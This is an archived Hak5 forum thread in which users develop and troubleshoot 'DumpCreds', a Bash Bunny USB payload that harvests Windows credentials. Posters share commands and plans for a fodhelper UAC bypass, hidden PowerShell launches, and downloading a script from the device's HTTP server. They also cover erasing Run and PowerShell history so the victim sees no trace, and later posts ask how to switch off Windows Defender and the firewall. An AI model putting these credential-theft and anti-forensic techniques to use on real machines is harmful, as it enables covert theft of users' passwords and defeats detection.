Feuermagier Posted September 13, 2017 Share Posted September 13, 2017 Ok, further improvements: A: Cleared History of "Run" (Win+R) by payload.txt B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1 I would like to move it into the Main payload.txt, but Bunny is making problems: He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol) Also I had Problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1). Maybe you can get it implemented in that line, so we even leave no trace in case of unsuccessful loading. https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds Link to comment Share on other sites More sharing options...
qdba Posted September 13, 2017 Author Share Posted September 13, 2017 23 minutes ago, Feuermagier said: Ok, further improvements: A: Cleared History of "Run" (Win+R) by payload.txt B: Clear Powershell History (rm $env:Appdata\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt) by main.ps1 I would like to move it into the Main payload.txt, but Bunny is making problems: He seems to be confused by the rm $env:Appdata. (He refuses to type the $-Symbol) Also I had Problems with stacking it into the last command executed by payload.txt (the one that loads main.ps1). Maybe you can get it implemented in that line, so we even leave no trace in case of unsuccessful loading. https://github.com/Valentin-Metz/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds Code for clearing "Run" history was already in main.ps1 ......... # Epmty Run Input Field Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentContinue ........ Added the code to clear Powwershell history to main.ps1 We should avoid too much "Q GUI r" commands. because it's visible. Link to comment Share on other sites More sharing options...
Feuermagier Posted September 13, 2017 Share Posted September 13, 2017 I did some testing, and the "powershell -w h" showed up in run after completion, so I added it to payload. txt. We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r. Link to comment Share on other sites More sharing options...
qdba Posted September 13, 2017 Author Share Posted September 13, 2017 13 minutes ago, Feuermagier said: I did some testing, and the "powershell -w h" showed up in run after completion, so I added it to payload. txt. We only use GUI + r once, I personally prefer to completely avoid the log by using GUI without r. Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the powershell history. Link to comment Share on other sites More sharing options...
Feuermagier Posted September 13, 2017 Share Posted September 13, 2017 59 minutes ago, qdba said: Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the powershell history. Maybe we can sent the taskkill and the delete in a single, stacked command. Link to comment Share on other sites More sharing options...
qdba Posted September 13, 2017 Author Share Posted September 13, 2017 2 minutes ago, Feuermagier said: Maybe we can sent the taskkill and the delete in a single, stacked command. Got it ... With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off. So I set it at the beginning of the Script and delete the History File at the end Link to comment Share on other sites More sharing options...
Feuermagier Posted September 13, 2017 Share Posted September 13, 2017 Just now, qdba said: Got it ... With Set-PSReadlineOption –HistorySaveStyle SaveNothing the History saving in Powershell will be switched off. So I set it at the beginning of the Script and delete the History File at the end Why save nothing if we delete anyway ? I thought more of kill powershell and delete file in a double command, so that is clear. Also we have to switch history back on, because user will have permanently no history, which is suspicious. Link to comment Share on other sites More sharing options...
qdba Posted September 13, 2017 Author Share Posted September 13, 2017 1 minute ago, Feuermagier said: Why save nothing if we delete anyway ? I thought more of kill powershell and delete file in a double command, so that is clear. Also we have to switch history back on, because user will have permanently no history, which is suspicious. It cannot be done in the line with the main.ps1 call because...... ....... A 1 first Powershell task will be started fo the input of the registry command for UAC Baypass. Than the fodhelper opens a second Powershell task in Admin mode. The first Powershell task can be closed after the fodhelper thing The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS Task. A third PS Task ist opening, waiting for HTTP Server is coming up and downloads the main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line. If you remove the history between the main.ps1 call and the exit command it's to fast. the main.ps1 is still running and create new history events. The main.ps1 is ready if the EOF File was created in the loot dir. ( payload.txt: line 95 ) The computer can be cleand after this event. so... 1. The history must switched of at the very first beginning befor the Regiytry Command of UAC Bypass. Considerations: does the Set-PSReadlineOption –HistorySaveStyle SaveNothing comman switch of the history global ? If so ... good... if not set a Marker in History file 2. Do all the stuff..... 3. Problem.... Switch history on after the EOF will be written. Maybe can be done with switch ATTACKMODE to HID and do all the things in a GUI (r ?) or start a dos comandline at the end of main.ps1 wo do all the cleanup (Switch on commandline kill powershell, copy back a saved history file, delete all lines from marker to end or.... / and... other things. Will sleep after that.. Link to comment Share on other sites More sharing options...
Feuermagier Posted September 13, 2017 Share Posted September 13, 2017 I don't think Powershell-Scripts are creating History. Or were you already deleting those ? Link to comment Share on other sites More sharing options...
qdba Posted September 13, 2017 Author Share Posted September 13, 2017 13 minutes ago, Feuermagier said: I don't think Powershell-Scripts are creating History. Or were you already deleting those ? I must check, if the command for switching of the history is still in the history file after execution. Can't do it now. Have no powershell here. The result give me the route foe the rest. Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted September 13, 2017 Share Posted September 13, 2017 Hmm, I keep seeing deja'vu when I read through that main.ps1 :-P Anyway, I maybe touching this script a lot to make some changes. I see some improvements. I need to mess with the fodhelper bypass technique first though to see what is going on. I know the Windows 7 Eventviewer bypass technique but only read about the fod one. I just have...ideas. if the clouds of work break this week, I will spin something out. Where is the original repo so I can just contribute there? I will let you push it up to Hak5 if any changes I make meet your liking. Link to comment Share on other sites More sharing options...
qdba Posted September 21, 2017 Author Share Posted September 21, 2017 OK.... Some new changes (Beta State) Better Cleanup - remove all changes in Powershell History - remove all changes in Run MRU (not only delete te files) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds Link to comment Share on other sites More sharing options...
JediMasterX Posted September 23, 2017 Share Posted September 23, 2017 Thanks! JMX Link to comment Share on other sites More sharing options...
qdba Posted September 25, 2017 Author Share Posted September 25, 2017 Add multiple UAC Modes set variable UAC_MODE in payload.txt UAC_MODE=1 # Fodhelper UAC UAC_MODE=0 # Standard UAC Mode Just Beta ( Works on my Windows 10 - Not tested on 7 yet) Link to comment Share on other sites More sharing options...
FredHilbert Posted October 30, 2017 Share Posted October 30, 2017 Thank you @qdba One of the best payload in my opinion !! Link to comment Share on other sites More sharing options...
UnLo Posted November 5, 2017 Share Posted November 5, 2017 Still only work on fw 1.1? Link to comment Share on other sites More sharing options...
m40295 Posted November 6, 2017 Share Posted November 6, 2017 14 hours ago, UnLo said: Still only work on fw 1.1? 1.1+ any firmware. 1.1 or more. Link to comment Share on other sites More sharing options...
UnLo Posted November 6, 2017 Share Posted November 6, 2017 8 hours ago, m40295 said: 1.1+ any firmware. 1.1 or more. Yep. My bad. Completely missed the (+) Link to comment Share on other sites More sharing options...
Spoonman Posted April 16, 2018 Share Posted April 16, 2018 I got it working on Windows 10 Pro edition. However it only worked when the firewall was off, with it on it was unable to get an IP. Any idea? Is there a payload that can turn the Windows Defender off? Link to comment Share on other sites More sharing options...
TwistedPacket Posted April 17, 2018 Share Posted April 17, 2018 Hello, I am on the latest fw and have a odd issue. When I plug in the BB it turns green for a few seconds like its booting then does nothing at all if I have the switch selected for DumpCreds. I would think that the led light would come on but it never does? I have tested a lot of other payloads and never have seen this happen. Does anyone have any ideas? Thanks! Link to comment Share on other sites More sharing options...
heartbleed Posted May 18, 2018 Share Posted May 18, 2018 Is Firefox working for you? I can only see the Creds Dumped from Chrome.... Link to comment Share on other sites More sharing options...
Prometheus1621 Posted July 10, 2018 Share Posted July 10, 2018 On 4/16/2018 at 2:20 PM, Spoonman said: I got it working on Windows 10 Pro edition. However it only worked when the firewall was off, with it on it was unable to get an IP. Any idea? Is there a payload that can turn the Windows Defender off? You can easily make a simple add on to have powershell turn it off and back on at the end Link to comment Share on other sites More sharing options...
Kalierko Posted January 23, 2019 Share Posted January 23, 2019 On 7/10/2018 at 11:49 PM, Prometheus1621 said: You can easily make a simple add on to have powershell turn it off and back on at the end Please, where I Can insert this Add on ? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.